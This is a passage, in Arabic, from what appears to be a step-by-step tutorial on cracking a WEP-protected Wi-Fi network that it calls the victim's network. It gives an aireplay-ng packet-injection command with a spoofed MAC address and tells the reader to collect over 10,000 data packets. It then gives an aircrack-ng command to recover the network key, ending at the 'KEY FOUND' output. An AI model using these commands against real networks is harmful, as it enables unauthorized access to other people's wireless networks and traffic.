essid - اسم SSID الخاص بشبكة الضحية.

نحن في انتظار الرسالة "جمعية ناجحة".

aireplay-ng -3 -b (bssid) -h 00: 11: 22: 33: 44: 55 (الواجهة)

أنت الآن بحاجة إلى إظهار كل صبرك والانتظار حتى يتجاوز الرقم الموجود في عمود #Data علامة 10000.

عند الوصول إلى المقدار المطلوب من البيانات التي تم جمعها ، افتح نافذة Konsole الثالثة وأدخل:

aircrack-ng -b (bssid) (اسم الملف -01.cap)

يتم إدخال الاسم الذي حددته سابقًا للملف كاسم.

إذا نجحت ، فسترى السطر "KEY FOUND" ، الذي يحتوي على مفتاح الشبكة.